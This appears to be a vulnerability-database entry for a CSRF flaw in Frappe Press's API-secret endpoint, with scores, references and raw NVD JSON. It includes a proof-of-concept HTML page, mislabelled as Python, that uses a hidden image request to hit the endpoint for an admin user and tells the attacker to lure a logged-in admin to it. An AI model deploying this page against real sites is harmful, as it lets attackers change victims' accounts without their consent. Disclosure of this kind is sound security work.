CVE-2026-41317

Description

Press, a Frappe custom app that runs Frappe Cloud, manages infrastructure, subscription, marketplace, and software-as-a-service (SaaS).`press.api.account.create_api_secret` is prone to CSRF-like exploits. This endpoint writes to database and it is also accessible via GET method. The patch in commit 52ea2f2d1b587be0807557e96f025f47897d00fd restricts method to POST.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:frappe:press:*:*:*:*:*:*:*:* - VULNERABLE

Frappe Press (Versions prior to commit 52ea2f2d)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- Proof of Concept for CVE-2026-41317 -->
<!-- Description: This HTML page demonstrates how an attacker can exploit the CSRF vulnerability via a GET request. -->
<!-- Usage: Host this file and trick a logged-in admin/user into visiting it. -->

<html>
  <body>
    <h1>Loading...</h1>
    <!-- The image tag attempts to load the URL, triggering the GET request with the user's cookies -->
    <img src="https://[target-domain]/press/api/account/create_api_secret?user=admin" width="0" height="0" style="display:none;" />
    
    <script>
      // Alternative method using JavaScript to send the request
      // fetch('https://[target-domain]/press/api/account/create_api_secret?user=admin', {
      //   method: 'GET',
      //   credentials: 'include'
      // });
      
      console.log("CSRF exploit attempt sent for CVE-2026-41317");
    </script>
  </body>
</html>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-41317
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-41317
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-41317/
[4] VulDB https://vuldb.com/cve/CVE-2026-41317
[5] https://github.com/frappe/press/commit/52ea2f2d1b587be0807557e96f025f47897d00fd
[6] https://github.com/frappe/press/security/advisories/GHSA-q4wg-jrr8-vpwf

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-41317", "sourceIdentifier": "[email protected]", "published": "2026-04-24T03:16:12.113", "lastModified": "2026-04-30T14:53:51.787", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Press, a Frappe custom app that runs Frappe Cloud, manages infrastructure, subscription, marketplace, and software-as-a-service (SaaS).`press.api.account.create_api_secret` is prone to CSRF-like exploits. This endpoint writes to database and it is also accessible via GET method. The patch in commit 52ea2f2d1b587be0807557e96f025f47897d00fd restricts method to POST."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:frappe:press:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.9.0", "matchCriteriaId": "3FD9CD87-D255-4BB8-86B7-791DEDD6955F"}]}]}], "references": [{"url": "https://github.com/frappe/press/commit/52ea2f2d1b587be0807557e96f025f47897d00fd", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/frappe/press/security/advisories/GHSA-q4wg-jrr8-vpwf", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}